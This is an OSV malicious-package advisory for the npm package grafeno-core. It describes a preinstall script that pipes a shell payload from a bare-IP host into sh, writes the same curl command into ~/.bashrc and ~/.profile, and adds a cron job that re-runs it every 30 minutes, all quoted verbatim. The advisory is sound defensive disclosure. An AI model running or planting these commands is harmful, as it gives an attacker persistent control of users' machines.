MAL-2026-15505

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/grafeno-core/MAL-2026-15505.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-15505
Published
2026-08-28T23:01:19Z
Modified
2026-08-29T02:30:11.892990991Z
Summary
Malicious code in grafeno-core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e)

The package's preinstall lifecycle script runs curl -s http://216.126.236.46/x.sh | sh at npm install time, fetching and executing an attacker-controlled shell payload from a plain-HTTP bare-IP host. The same preinstall appends curl -s 216.126.236.46/x.sh|sh to ~/.bashrc and ~/.profile and installs a crontab entry */30 * * * * curl -s 216.126.236.46/x.sh|sh, re-fetching and executing the remote payload every 30 minutes for persistent host access. The advertised entry point index.js is a two-line stub exporting version and init, with no real functionality — the manifest's preinstall is the entire payload.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-019058",
            "modified_time": "2026-08-28T23:01:19Z",
            "import_time": "2026-08-28T23:14:35.035864607Z",
            "source": "amazon-inspector",
            "sha256": "19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-019115",
            "modified_time": "2026-08-29T01:42:47Z",
            "import_time": "2026-08-29T02:22:18.268552772Z",
            "source": "amazon-inspector",
            "sha256": "3ba74dd8ae36cb8f592f3057a5a3f95ad630576e2cab9b0112fa97d2a773385f",
            "versions": [
                "1.0.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / grafeno-core

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "grafeno-core-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-ulP2ORYh6WeCNcFFfX7U+iT7mO3fXCBJIx2J1Dgyz3Zs0YRUYG2YWhTJzwSYV4RWMD3X5kq+88FWdbB/U+k9cw==",
                "sha1": "98c8a35b063283cf6bcd2734b832d36553d362f1"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "7d11bbf0c574eb376ec6727076a40112b7d794553908ec845f8c489eb27b2931eb6c6b",
            "sha256": "1a9f49458d23c41471393b78da90a480e5db50e0740d304b7dee890bebfe11f9"
        },
        {
            "path": "index.js",
            "tlsh": "e990024175a1b6f705568155a541454767a448843715445c954d665602c1e3d42415c8",
            "sha256": "289476f446b51fe6fb0234c9ce3f9285e1de6466128d897571f33bbd56c76491"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/grafeno-core/MAL-2026-15505.json"